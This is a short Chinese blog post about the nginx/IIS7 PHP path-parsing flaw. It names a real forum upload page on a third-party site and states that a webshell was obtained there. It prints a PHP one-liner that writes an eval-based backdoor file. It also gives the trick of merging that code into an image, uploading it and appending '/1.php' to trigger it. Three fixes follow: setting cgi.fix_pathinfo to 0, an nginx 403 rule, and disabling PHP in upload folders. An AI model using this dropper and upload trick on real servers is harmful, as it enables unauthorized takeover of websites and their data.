nginx&IIS7.0&IIS7.5+php解析拿webshell | 熊猫博客
当前位置: 首页 > PHP, 漏洞列表, 编程语言 > 正文

nginx&IIS7.0&IIS7.5+php解析拿webshell

上传地址:http://bbs.myoppo.com/bluesword/blue_sword.php?t=t_upload&Action=PostMsg

已使用解析拿下shell。

大马:<?fputs(fopen("x.php","w"),"<?eval(\$_POST[g]);?>")?>

只要把大马和一张图片合成后,上传,直接在后面加入1.php 自动生成x.php的木马。

修复方案:
1、设置php.ini的cgi.fix_pathinfo为0,重启php。最方便,但修改设置的影响需要自己评估。
2、给nginx的vhost配置添加如下内容,重启nginx。vhost较少的情况下也很方便。

if ( $fastcgi_script_name ~ \..*\/.*php ) {

return 403;

}
3、禁止上传目录解释PHP程序。不需要动webserver,如果vhost和服务器较多,短期内难度急剧上升;建议在vhost和服务器较少的情况下采用


本文固定链接: http://www.chnpanda.com/527.html | 熊猫博客 | 转载请注明出处,谢谢合作!

本文关键字:

nginx&IIS7.0&IIS7.5+php解析拿webshell:等您坐沙发呢!

发表评论

亲,不支持纯字母、符号评论哦~